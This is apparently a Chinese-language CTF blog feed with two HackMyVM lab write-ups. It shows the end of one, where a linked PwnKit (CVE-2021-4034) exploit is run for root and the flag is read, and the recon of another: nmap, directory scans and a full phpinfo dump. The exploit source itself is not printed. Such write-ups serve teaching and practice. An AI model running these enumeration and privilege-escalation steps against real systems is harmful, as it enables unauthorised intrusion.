https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py

thugger@drippingblues:/tmp$ vi root.py
thugger@drippingblues:/tmp$ python3 root.py 
[+] Creating shared library for exploit code.
[+] Calling execve()
# id
uid=0(root) gid=1001(thugger) groups=1001(thugger)

root.txt
# cat root.txt
78CE377EF7F10FF0EDCA63DD60EE63B8

This rendering was automatically generated by Frosti Feed and may have formatting issues. For the best experience, please visit: https://heathc1iff-sec.github.io/blog/hmvmachines/drippingblues/

HMV-Ephemeral

呼啸山庄 — Tue, 13 Jan 2026 00:00:00 GMT

信息收集

IP定位

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# arp-scan -l | grep "08:00:27"
192.168.0.100   08:00:27:89:6b:14       PCS Systemtechnik GmbH

nmap扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# nmap -Pn -sTCV -T4 -p0-65535 192.168.0.100
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-13 02:12 EST
Nmap scan report for mail.codeshield.hmv (192.168.0.100)
Host is up (0.00040s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 0a:0d:44:3c:38:8f:c0:6d:5d:72:18:e6:d9:12:3e:57 (RSA)
|   256 4d:7d:ba:6f:a9:88:ea:a2:34:3a:6a:0c:3a:27:1c:d5 (ECDSA)
|_  256 74:36:bf:af:8a:53:0a:c1:7f:ca:2e:a1:5c:c5:25:ad (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: AutoWash - Car Wash Website Template
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.37 seconds

目录扫描

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# dirsearch -u http://192.168.0.100

  _|. _ _  _  _  _ _|_    v0.4.3                     
 (_||| _) (/_(_|| (_| )                              
                                                     
Extensions: php, aspx, jsp, html, js
HTTP method: GET | Threads: 25
Wordlist size: 11460

Output File: /home/kali/Desktop/hmv/reports/http_192.168.0.100/_26-01-13_02-13-43.txt

Target: http://192.168.0.100/

[02:13:43] Starting:                                 
[02:13:43] 301 -  311B  - /js  ->  http://192.168.0.100/js/
[02:13:44] 403 -  278B  - /.ht_wsr.txt
[02:13:44] 403 -  278B  - /.htaccess.orig
[02:13:44] 403 -  278B  - /.htaccess_orig
[02:13:44] 403 -  278B  - /.htaccess_extra
[02:13:44] 403 -  278B  - /.htaccessBAK
[02:13:44] 403 -  278B  - /.htaccess.bak1
[02:13:44] 403 -  278B  - /.htaccessOLD2
[02:13:44] 403 -  278B  - /.html
[02:13:44] 403 -  278B  - /.htaccess.save
[02:13:44] 403 -  278B  - /.htpasswd_test
[02:13:44] 403 -  278B  - /.htaccess_sc
[02:13:44] 403 -  278B  - /.htaccessOLD
[02:13:44] 403 -  278B  - /.htaccess.sample
[02:13:44] 403 -  278B  - /.htm
[02:13:44] 403 -  278B  - /.httr-oauth
[02:13:44] 403 -  278B  - /.htpasswds
[02:13:45] 403 -  278B  - /.php
[02:13:48] 200 -    3KB - /about.html
[02:14:06] 200 -    3KB - /contact.html
[02:14:07] 301 -  312B  - /css  ->  http://192.168.0.100/css/
[02:14:18] 301 -  312B  - /img  ->  http://192.168.0.100/img/
[02:14:21] 200 -  454B  - /js/
[02:14:22] 200 -  511B  - /lib/
[02:14:22] 301 -  312B  - /lib  ->  http://192.168.0.100/lib/
[02:14:22] 200 -  592B  - /LICENSE.txt
[02:14:25] 301 -  313B  - /mail  ->  http://192.168.0.100/mail/
[02:14:25] 200 -  515B  - /mail/
[02:14:43] 403 -  278B  - /server-status
[02:14:43] 403 -  278B  - /server-status/

Task Completed

┌──(web)─(root㉿kali)-[/home/kali/Desktop/hmv]
└─# gobuster dir -u http://192.168.0.100 -w /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt -x php,txt,html,zip,db,bak,js,yaml -t 64 
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.0.100
[+] Method:                  GET
[+] Threads:                 64
[+] Wordlist:                /usr/share/wordlists/seclists/Discovery/Web-Content/DirBuster-2007_directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              bak,js,yaml,php,txt,html,zip,db
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/contact.html         (Status: 200) [Size: 15151]
/blog.html            (Status: 200) [Size: 20094]
/img                  (Status: 301) [Size: 312] [--> http://192.168.0.100/img/]                           
/mail                 (Status: 301) [Size: 313] [--> http://192.168.0.100/mail/]                          
/service.html         (Status: 200) [Size: 16853]
/about.html           (Status: 200) [Size: 18464]
/index.html           (Status: 200) [Size: 39494]
/css                  (Status: 301) [Size: 312] [--> http://192.168.0.100/css/]                           
/team.html            (Status: 200) [Size: 18605]
/lib                  (Status: 301) [Size: 312] [--> http://192.168.0.100/lib/]                           
/js                   (Status: 301) [Size: 311] [--> http://192.168.0.100/js/]                            
/cd                   (Status: 301) [Size: 311] [--> http://192.168.0.100/cd/]                            
/location.html        (Status: 200) [Size: 14685]
/price.html           (Status: 200) [Size: 14635]
/price                (Status: 301) [Size: 314] [--> http://192.168.0.100/price/]                         
/prices               (Status: 301) [Size: 315] [--> http://192.168.0.100/prices/]                        
/LICENSE.txt          (Status: 200) [Size: 1309]
/single.html          (Status: 200) [Size: 48856]
/booking.html         (Status: 200) [Size: 14677]
/.html                (Status: 403) [Size: 278]
/.php                 (Status: 403) [Size: 278]
/phpsysinfo.php       (Status: 200) [Size: 69419]
/server-status        (Status: 403) [Size: 278]
Progress: 1985031 / 1985040 (100.00%)
===============================================================
Finished
===============================================================

eyIxIjp7IklEIjoxLCJuYW1lIjoiTXkgaWNvbnMgY29sbGVjdGlvbiIsImJvb2ttYXJrX2lkIjoibXdsYTJyMGN2cGEwMDAwMCIsImNyZWF0ZWQiOm51bGwsInVwZGF0ZWQiOjE2MDI0MDM3MTEsImFjdGl2ZSI6MSwic291cmNlIjoibG9jYWwiLCJvcmRlciI6MCwiY29sb3IiOiIwMDAwMDAiLCJzdGF0dXMiOjF9LCJtd2xhMnIwY3ZwYTAwMDAwIjpbeyJpZCI6MjA1MjM1NywidGVhbSI6MCwibmFtZSI6ImNhci1zZXJ2aWNlIiwiY29sb3IiOiIjMDAwMDAwIiwicHJlbWl1bSI6MCwic29ydCI6Mn0seyJpZCI6MjA1MjM5OCwidGVhbSI6MCwibmFtZSI6InNlYXQiLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0IjozfSx7ImlkIjoyMDUyMzQxLCJ0ZWFtIjowLCJuYW1lIjoiY2FyLXNlcnZpY2UiLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo0fSx7ImlkIjoyMDUyNDE3LCJ0ZWFtIjowLCJuYW1lIjoiY2FyLXdhc2giLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo1fSx7ImlkIjoyMDUyMzI0LCJ0ZWFtIjowLCJuYW1lIjoiYnJ1c2giLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo2fSx7ImlkIjoyMDUyNDIxLCJ0ZWFtIjowLCJuYW1lIjoidmFjdXVtLWNsZWFuZXIiLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo3fSx7ImlkIjoyMDUyMzY0LCJ0ZWFtIjowLCJuYW1lIjoiYnJ1c2giLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo4fSx7ImlkIjoyMDUyMzUzLCJ0ZWFtIjowLCJuYW1lIjoiY2FyLXNlcnZpY2UiLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0Ijo5fSx7ImlkIjoyMDUyMzkxLCJ0ZWFtIjowLCJuYW1lIjoiY2FyLXNlcnZpY2UiLCJjb2xvciI6IiMwMDAwMDAiLCJwcmVtaXVtIjowLCJzb3J0IjoxMH0seyJpZCI6MjA1MjMyMiwidGVhbSI6MCwibmFtZSI6ImNhci13YXNoIiwiY29sb3IiOiIjMDAwMDAwIiwicHJlbWl1bSI6MCwic29ydCI6MX1dfQ==

base64解码后得到

{"1":{"ID":1,"name":"My icons collection","bookmark_id":"mwla2r0cvpa00000","created":null,"updated":1602403711,"active":1,"source":"local","order":0,"color":"000000","status":1},"mwla2r0cvpa00000":[{"id":2052357,"team":0,"name":"car-service","color":"#000000","premium":0,"sort":2},{"id":2052398,"team":0,"name":"seat","color":"#000000","premium":0,"sort":3},{"id":2052341,"team":0,"name":"car-service","color":"#000000","premium":0,"sort":4},{"id":2052417,"team":0,"name":"car-wash","color":"#000000","premium":0,"sort":5},{"id":2052324,"team":0,"name":"brush","color":"#000000","premium":0,"sort":6},{"id":2052421,"team":0,"name":"vacuum-cleaner","color":"#000000","premium":0,"sort":7},{"id":2052364,"team":0,"name":"brush","color":"#000000","premium":0,"sort":8},{"id":2052353,"team":0,"name":"car-service","color":"#000000","premium":0,"sort":9},{"id":2052391,"team":0,"name":"car-service","color":"#000000","premium":0,"sort":10},{"id":2052322,"team":0,"name":"car-wash","color":"#000000","premium":0,"sort":1}]}

/phpsyinfo

Ephemeral PHP Info Page
PHP logo
PHP Version 7.4.3
System 	Linux ephemeral 5.17.0-051700rc7-generic #202203062330 SMP PREEMPT Sun Mar 6 23:33:35 UTC 2022 x86_64
Build Date 	Mar 2 2022 15:36:52
Server API 	Apache 2.0 Handler
Virtual Directory Support 	disabled
Configuration File (php.ini) Path 	/etc/php/7.4/apache2
Loaded Configuration File 	/etc/php/7.4/apache2/php.ini
Scan this dir for additional .ini files 	/etc/php/7.4/apache2/conf.d
Additional .ini files parsed 	/etc/php/7.4/apache2/conf.d/10-opcache.ini, /etc/php/7.4/apache2/conf.d/10-pdo.ini, /etc/php/7.4/apache2/conf.d/20-calendar.ini, /etc/php/7.4/apache2/conf.d/20-ctype.ini, /etc/php/7.4/apache2/conf.d/20-exif.ini, /etc/php/7.4/apache2/conf.d/20-ffi.ini, /etc/php/7.4/apache2/conf.d/20-fileinfo.ini, /etc/php/7.4/apache2/conf.d/20-ftp.ini, /etc/php/7.4/apache2/conf.d/20-gettext.ini, /etc/php/7.4/apache2/conf.d/20-iconv.ini, /etc/php/7.4/apache2/conf.d/20-json.ini, /etc/php/7.4/apache2/conf.d/20-phar.ini, /etc/php/7.4/apache2/conf.d/20-posix.ini, /etc/php/7.4/apache2/conf.d/20-readline.ini, /etc/php/7.4/apache2/conf.d/20-shmop.ini, /etc/php/7.4/apache2/conf.d/20-sockets.ini, /etc/php/7.4/apache2/conf.d/20-sysvmsg.ini, /etc/php/7.4/apache2/conf.d/20-sysvsem.ini, /etc/php/7.4/apache2/conf.d/20-sysvshm.ini, /etc/php/7.4/apache2/conf.d/20-tokenizer.ini
PHP API 	20190902
PHP Extension 	20190902
Zend Extension 	320190902
Zend Extension Build 	API320190902,NTS
PHP Extension Build 	API20190902,NTS
Debug Build 	no
Thread Safety 	disabled
Zend Signal Handling 	enabled
Zend Memory Manager 	enabled
Zend Multibyte Support 	disabled
IPv6 Support 	enabled
DTrace Support 	available, disabled
Registered PHP Streams	https, ftps, compress.zlib, php, file, glob, data, http, ftp, phar
Registered Stream Socket Transports	tcp, udp, unix, udg, ssl, tls, tlsv1.0, tlsv1.1, tlsv1.2, tlsv1.3
Registered Stream Filters	zlib.*, string.rot13, string.toupper, string.tolower, string.strip_tags, convert.*, consumed, dechunk, convert.iconv.*
Zend logo This program makes use of the Zend Scripting Language Engine:
Zend Engine v3.4.0, Copyright (c) Zend Technologies
    with Zend OPcache v7.4.3, Copyright (c), by Zend Technologies
Configuration
apache2handler
Apache Version 	Apache/2.4.41 (Ubuntu)
Apache API Version 	20120211
Server Administrator 	webmaster@localhost
Hostname:Port 	127.0.1.1:80
User/Group 	www-data(33)/33
Max Requests 	Per Child: 0 - Keep Alive: on - Max Per Connection: 100
Timeouts 	Connection: 300 - Keep-Alive: 5
Virtual Server 	Yes
Server Root 	/etc/apache2
Loaded Modules 	core mod_so mod_watchdog http_core mod_log_config mod_logio mod_version mod_unixd mod_access_compat mod_alias mod_auth_basic mod_authn_core mod_authn_file mod_authz_core mod_authz_host mod_authz_user mod_autoindex mod_deflate mod_dir mod_env mod_filter mod_mime prefork mod_negotiation mod_php7 mod_reqtimeout mod_setenvif mod_status
Directive	Local Value	Master Value
engine	1	1
last_modified	0	0
xbithack	0	0
Apache Environment
Variable	Value
HTTP_HOST 	192.168.0.100
HTTP_USER_AGENT 	Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
HTTP_ACCEPT 	text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
HTTP_ACCEPT_LANGUAGE 	zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
HTTP_ACCEPT_ENCODING 	gzip, deflate
HTTP_CONNECTION 	keep-alive
HTTP_UPGRADE_INSECURE_REQUESTS 	1
HTTP_PRIORITY 	u=0, i
PATH 	/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
SERVER_SIGNATURE 	<address>Apache/2.4.41 (Ubuntu) Server at 192.168.0.100 Port 80</address>
SERVER_SOFTWARE 	Apache/2.4.41 (Ubuntu)
SERVER_NAME 	192.168.0.100
SERVER_ADDR 	192.168.0.100
SERVER_PORT 	80
REMOTE_ADDR 	192.168.0.106
DOCUMENT_ROOT 	/var/www/html
REQUEST_SCHEME 	http
CONTEXT_PREFIX 	no value
CONTEXT_DOCUMENT_ROOT 	/var/www/html
SERVER_ADMIN 	webmaster@localhost
SCRIPT_FILENAME 	/var/www/html/phpsysinfo.php
REMOTE_PORT 	52058
GATEWAY_INTERFACE 	CGI/1.1
SERVER_PROTOCOL 	HTTP/1.1
REQUEST_METHOD 	GET
QUERY_STRING 	no value
REQUEST_URI 	/phpsysinfo.php
SCRIPT_NAME 	/phpsysinfo.php
HTTP Headers Information
HTTP Request Headers
HTTP Request 	GET /phpsysinfo.php HTTP/1.1
Host 	192.168.0.100
User-Agent 	Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept 	text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language 	zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding 	gzip, deflate
Connection 	keep-alive
Upgrade-Insecure-Requests 	1
Priority 	u=0, i
HTTP Response Headers
calendar
Calendar support 	enabled
Core
PHP Version 	7.4.3
Directive	Local Value	Master Value
allow_url_fopen	On	On
allow_url_include	Off	Off
arg_separator.input	&	&
arg_separator.output	&	&
auto_append_file	no value	no value
auto_globals_jit	On	On
auto_prepend_file	no value	no value
browscap	no value	no value
default_charset	UTF-8	UTF-8
default_mimetype	text/html	text/html
disable_classes	no value	no value
disable_functions	pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,	pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,pcntl_unshare,
display_errors	Off	Off
display_startup_errors	Off	Off
doc_root	no value	no value
docref_ext	no value	no value
docref_root	no value	no value
enable_dl	Off	Off
enable_post_data_reading	On	On
error_append_string	no value	no value
error_log	no value	no value
error_prepend_string	no value	no value
error_reporting	22527	22527
expose_php	Off	Off
extension_dir	/usr/lib/php/20190902	/usr/lib/php/20190902
file_uploads	On	On
hard_timeout	2	2
highlight.comment	#FF8000	#FF8000
highlight.default	#0000BB	#0000BB
highlight.html	#000000	#000000
highlight.keyword	#007700	#007700
highlight.string	#DD0000	#DD0000
html_errors	On	On
ignore_repeated_errors	Off	Off
ignore_repeated_source	Off	Off
ignore_user_abort	Off	Off
implicit_flush	Off	Off
include_path	.:/usr/share/php	.:/usr/share/php
input_encoding	no value	no value
internal_encoding	no value	no value
log_errors	On	On
log_errors_max_len	1024	1024
mail.add_x_header	Off	Off
mail.force_extra_parameters	no value	no value
mail.log	no value	no value
max_execution_time	30	30
max_file_uploads	20	20
max_input_nesting_level	64	64
max_input_time	60	60
max_input_vars	1000	1000
memory_limit	128M	128M
open_basedir	no value	no value
output_buffering	4096	4096
output_encoding	no value	no value
output_handler	no value	no value
post_max_size	8M	8M
precision	14	14
realpath_cache_size	4096K	4096K
realpath_cache_ttl	120	120
register_argc_argv	Off	Off
report_memleaks	On	On
report_zend_debug	On	On
request_order	GP	GP
sendmail_from	no value	no value
sendmail_path	/usr/sbin/sendmail -t -i 	/usr/sbin/sendmail -t -i 
serialize_precision	-1	-1
short_open_tag	Off	Off
SMTP	localhost	localhost
smtp_port	25	25
sys_temp_dir	no value	no value
syslog.facility	LOG_USER	LOG_USER
syslog.filter	no-ctrl	no-ctrl
syslog.ident	php	php
track_errors	Off	Off
unserialize_callback_func	no value	no value
upload_max_filesize	2M	2M
upload_tmp_dir	no value	no value
user_dir	no value	no value
user_ini.cache_ttl	300	300
user_ini.filename	.user.ini	.user.ini
variables_order	GPCS	GPCS
xmlrpc_error_number	0	0
xmlrpc_errors	Off	Off
zend.assertions	-1	-1
zend.detect_unicode	On	On
zend.enable_gc	On	On
zend.exception_ignore_args	On	On
zend.multibyte	Off	Off
zend.script_encoding	no value	no value
zend.signal_check	Off	Off
ctype
ctype functions 	enabled
date
date/time support 	enabled
timelib version 	2018.03
"Olson" Timezone Database Version 	0.system
Timezone Database 	internal
Default timezone 	America/Denver
Directive	Local Value	Master Value
date.default_latitude	31.7667	31.7667
date.default_longitude	35.2333	35.2333
date.sunrise_zenith	90.583333	90.583333
date.sunset_zenith	90.583333	90.583333
date.timezone	no value	no value
exif
EXIF Support 	enabled
Supported EXIF Version 	0220
Supported filetypes 	JPEG, TIFF
Multibyte decoding support using mbstring 	disabled
Extended EXIF tag formats 	Canon, Casio, Fujifilm, Nikon, Olympus, Samsung, Panasonic, DJI, Sony, Pentax, Minolta, Sigma, Foveon, Kyocera, Ricoh, AGFA, Epson
Directive	Local Value	Master Value
exif.decode_jis_intel	JIS	JIS
exif.decode_jis_motorola	JIS	JIS
exif.decode_unicode_intel	UCS-2LE	UCS-2LE
exif.decode_unicode_motorola	UCS-2BE	UCS-2BE
exif.encode_jis	no value	no value
exif.encode_unicode	ISO-8859-15	ISO-8859-15
FFI
FFI support	enabled
Directive	Local Value	Master Value
ffi.enable	preload	preload
ffi.preload	no value	no value
fileinfo
fileinfo support 	enabled
libmagic 	537
filter
Input Validation and Filtering 	enabled
Directive	Local Value	Master Value
filter.default	unsafe_raw	unsafe_raw
filter.default_flags	no value	no value
ftp
FTP support 	enabled
FTPS support 	enabled
gettext
GetText Support 	enabled
hash
hash support 	enabled
Hashing Engines 	md2 md4 md5 sha1 sha224 sha256 sha384 sha512/224 sha512/256 sha512 sha3-224 sha3-256 sha3-384 sha3-512 ripemd128 ripemd160 ripemd256 ripemd320 whirlpool tiger128,3 tiger160,3 tiger192,3 tiger128,4 tiger160,4 tiger192,4 snefru snefru256 gost gost-crypto adler32 crc32 crc32b crc32c fnv132 fnv1a32 fnv164 fnv1a64 joaat haval128,3 haval160,3 haval192,3 haval224,3 haval256,3 haval128,4 haval160,4 haval192,4 haval224,4 haval256,4 haval128,5 haval160,5 haval192,5 haval224,5 haval256,5
MHASH support 	Enabled
MHASH API Version 	Emulated Support
iconv
iconv support 	enabled
iconv implementation 	glibc
iconv library version 	2.31
Directive	Local Value	Master Value
iconv.input_encoding	no value	no value
iconv.internal_encoding	no value	no value
iconv.output_encoding	no value	no value
json
json support 	enabled
libxml
libXML support 	active
libXML Compiled Version 	2.9.10
libXML Loaded Version 	20910
libXML streams 	enabled
openssl
OpenSSL support 	enabled
OpenSSL Library Version 	OpenSSL 1.1.1f 31 Mar 2020
OpenSSL Header Version 	OpenSSL 1.1.1f 31 Mar 2020
Openssl default config 	/usr/lib/ssl/openssl.cnf
Directive	Local Value	Master Value
openssl.cafile	no value	no value
openssl.capath	no value	no value
pcre
PCRE (Perl Compatible Regular Expressions) Support 	enabled
PCRE Library Version 	10.34 2019-11-21
PCRE Unicode Version 	12.1.0
PCRE JIT Support 	enabled
PCRE JIT Target 	x86 64bit (little endian + unaligned)
Directive	Local Value	Master Value
pcre.backtrack_limit	1000000	1000000
pcre.jit	1	1
pcre.recursion_limit	100000	100000
PDO
PDO support	enabled
PDO drivers 	no value
Phar
Phar: PHP Archive support	enabled
Phar API version 	1.1.1
Phar-based phar archives 	enabled
Tar-based phar archives 	enabled
ZIP-based phar archives 	enabled
gzip compression 	enabled
bzip2 compression 	disabled (install ext/bz2)
Native OpenSSL support 	enabled
Phar based on pear/PHP_Archive, original concept by Davey Shafik.
Phar fully realized by Gregory Beaver and Marcus Boerger.
Portions of tar implementation Copyright (c) 2003-2009 Tim Kientzle.
Directive	Local Value	Master Value
phar.cache_list	no value	no value
phar.readonly	On	On
phar.require_hash	On	On
posix
POSIX support 	enabled
readline
Readline Support	enabled
Readline library 	EditLine wrapper
Directive	Local Value	Master Value
cli.pager	no value	no value
cli.prompt	\b \> 	\b \> 
Reflection
Reflection 	enabled
session
Session Support 	enabled
Registered save handlers 	files user
Registered serializer handlers 	php_serialize php php_binary
Directive	Local Value	Master Value
session.auto_start	Off	Off
session.cache_expire	180	180
session.cache_limiter	nocache	nocache
session.cookie_domain	no value	no value
session.cookie_httponly	no value	no value
session.cookie_lifetime	0	0
session.cookie_path	/	/
session.cookie_samesite	no value	no value
session.cookie_secure	0	0
session.gc_divisor	1000	1000
session.gc_maxlifetime	1440	1440
session.gc_probability	0	0
session.lazy_write	On	On
session.name	PHPSESSID	PHPSESSID
session.referer_check	no value	no value
session.save_handler	files	files
session.save_path	/var/lib/php/sessions	/var/lib/php/sessions
session.serialize_handler	php	php
session.sid_bits_per_character	5	5
session.sid_length	26	26
session.upload_progress.cleanup	On	On
session.upload_progress.enabled	On	On
session.upload_progress.freq	1%	1%
session.upload_progress.min_freq	1	1
session.upload_progress.name	PHP_SESSION_UPLOAD_PROGRESS	PHP_SESSION_UPLOAD_PROGRESS
session.upload_progress.prefix	upload_progress_	upload_progress_
session.use_cookies	1	1
session.use_only_cookies	1	1
session.use_strict_mode	0	0
session.use_trans_sid	0	0
shmop
shmop support 	enabled
sockets
Sockets Support 	enabled
sodium
sodium support	enabled
libsodium headers version 	1.0.18
libsodium library version 	1.0.18
SPL
SPL support	enabled
Interfaces 	OuterIterator, RecursiveIterator, SeekableIterator, SplObserver, SplSubject
Classes 	AppendIterator, ArrayIterator, ArrayObject, BadFunctionCallException, BadMethodCallException, CachingIterator, CallbackFilterIterator, DirectoryIterator, DomainException, EmptyIterator, FilesystemIterator, FilterIterator, GlobIterator, InfiniteIterator, InvalidArgumentException, IteratorIterator, LengthException, LimitIterator, LogicException, MultipleIterator, NoRewindIterator, OutOfBoundsException, OutOfRangeException, OverflowException, ParentIterator, RangeException, RecursiveArrayIterator, RecursiveCachingIterator, RecursiveCallbackFilterIterator, RecursiveDirectoryIterator, RecursiveFilterIterator, RecursiveIteratorIterator, RecursiveRegexIterator, RecursiveTreeIterator, RegexIterator, RuntimeException, SplDoublyLinkedList, SplFileInfo, SplFileObject, SplFixedArray, SplHeap, SplMinHeap, SplMaxHeap, SplObjectStorage, SplPriorityQueue, SplQueue, SplStack, SplTempFileObject, UnderflowException, UnexpectedValueException
standard
Dynamic Library Support 	enabled
Path to sendmail 	/usr/sbin/sendmail -t -i
Directive	Local Value	Master Value
assert.active	1	1
assert.bail	0	0
assert.callback	no value	no value
assert.exception	0	0
assert.quiet_eval	0	0
assert.warning	1	1
auto_detect_line_endings	0	0
default_socket_timeout	60	60
from	no value	no value
session.trans_sid_hosts	no value	no value
session.trans_sid_tags	a=href,area=href,frame=src,form=	a=href,area=href,frame=src,form=
unserialize_max_depth	4096	4096
url_rewriter.hosts	no value	no value
url_rewriter.tags	form=	form=
user_agent	no value	no value
sysvmsg
sysvmsg support 	enabled
sysvsem
sysvsem support 	enabled
sysvshm
sysvshm support 	enabled
tokenizer
Tokenizer Support 	enabled
Zend OPcache
Opcode Caching 	Up and Running
Optimization 	Enabled
SHM Cache 	Enabled
File Cache 	Disabled
Startup 	OK
Shared memory model 	mmap
Cache hits 	1
Cache misses 	2
Used memory 	9169552
Free memory 	125048176
Wasted memory 	0
Interned Strings Used memory 	189744
Interned Strings Free memory 	6101264
Cached scripts 	2
Cached keys 	2
Max keys 	16229
OOM restarts 	0
Hash keys restarts 	0
Manual restarts 	0
Directive	Local Value	Master Value
opcache.blacklist_filename	no value	no value
opcache.consistency_checks	0	0
opcache.dups_fix	Off	Off
opcache.enable	On	On
opcache.enable_cli	Off	Off
opcache.enable_file_override	Off	Off
opcache.error_log	no value	no value
opcache.file_cache	no value	no value
opcache.file_cache_consistency_checks	1	1
opcache.file_cache_only	0	0
opcache.file_update_protection	2	2
opcache.force_restart_timeout	180	180
opcache.huge_code_pages	Off	Off
opcache.interned_strings_buffer	8	8
opcache.lockfile_path	/tmp	/tmp
opcache.log_verbosity_level	1	1
opcache.max_accelerated_files	10000	10000
opcache.max_file_size	0	0
opcache.max_wasted_percentage	5	5
opcache.memory_consumption	128	128
opcache.opt_debug_level	0	0
opcache.optimization_level	0x7FFEBFFF	0x7FFEBFFF
opcache.preferred_memory_model	no value	no value
opcache.preload	no value	no value
opcache.preload_user	no value	no value
opcache.protect_memory	0	0
opcache.restrict_api	no value	no value
opcache.revalidate_freq	2	2
opcache.revalidate_path	Off	Off
opcache.save_comments	1	1
opcache.use_cwd	On	On
opcache.validate_permission	Off	Off
opcache.validate_root	Off	Off
opcache.validate_timestamps	On	On
zlib
ZLib Support	enabled
Stream Wrapper 	compress.zlib://
Stream Filter 	zlib.inflate, zlib.deflate
Compiled Version 	1.2.11
Linked Version 	1.2.11
Directive	Local Value	Master Value
zlib.output_compression	Off	Off
zlib.output_compression_level	-1	-1
zlib.output_handler	no value	no value
Additional Modules
Module Name
Environment
Variable	Value
APACHE_RUN_DIR 	/var/run/apache2
APACHE_PID_FILE 	/var/run/apache2/apache2.pid
JOURNAL_STREAM 	8:23251
PATH 	/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
INVOCATION_ID 	3e18f41ea23e444d91aece512878f6db
APACHE_LOCK_DIR 	/var/lock/apache2
LANG 	C
APACHE_RUN_USER 	www-data
APACHE_RUN_GROUP 	www-data
APACHE_LOG_DIR 	/var/log/apache2
PWD 	/
PHP Variables
Variable	Value
$_SERVER['HTTP_HOST']	192.168.0.100
$_SERVER['HTTP_USER_AGENT']	Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
$_SERVER['HTTP_ACCEPT']	text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
$_SERVER['HTTP_ACCEPT_LANGUAGE']	zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
$_SERVER['HTTP_ACCEPT_ENCODING']	gzip, deflate
$_SERVER['HTTP_CONNECTION']	keep-alive
$_SERVER['HTTP_UPGRADE_INSECURE_REQUESTS']	1
$_SERVER['HTTP_PRIORITY']	u=0, i
$_SERVER['PATH']	/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
$_SERVER['SERVER_SIGNATURE']	<address>Apache/2.4.41 (Ubuntu) Server at 192.168.0.100 Port 80</address>
$_SERVER['SERVER_SOFTWARE']	Apache/2.4.41 (Ubuntu)
$_SERVER['SERVER_NAME']	192.168.0.100
$_SERVER['SERVER_ADDR']	192.168.0.100
$_SERVER['SERVER_PORT']	80
$_SERVER['REMOTE_ADDR']	192.168.0.106
$_SERVER['DOCUMENT_ROOT']	/var/www/html
$_SERVER['REQUEST_SCHEME']	http
$_SERVER['CONTEXT_PREFIX']	no value
$_SERVER['CONTEXT_DOCUMENT_ROOT']	/var/www/html
$_SERVER['SERVER_ADMIN']	webmaster@localhost
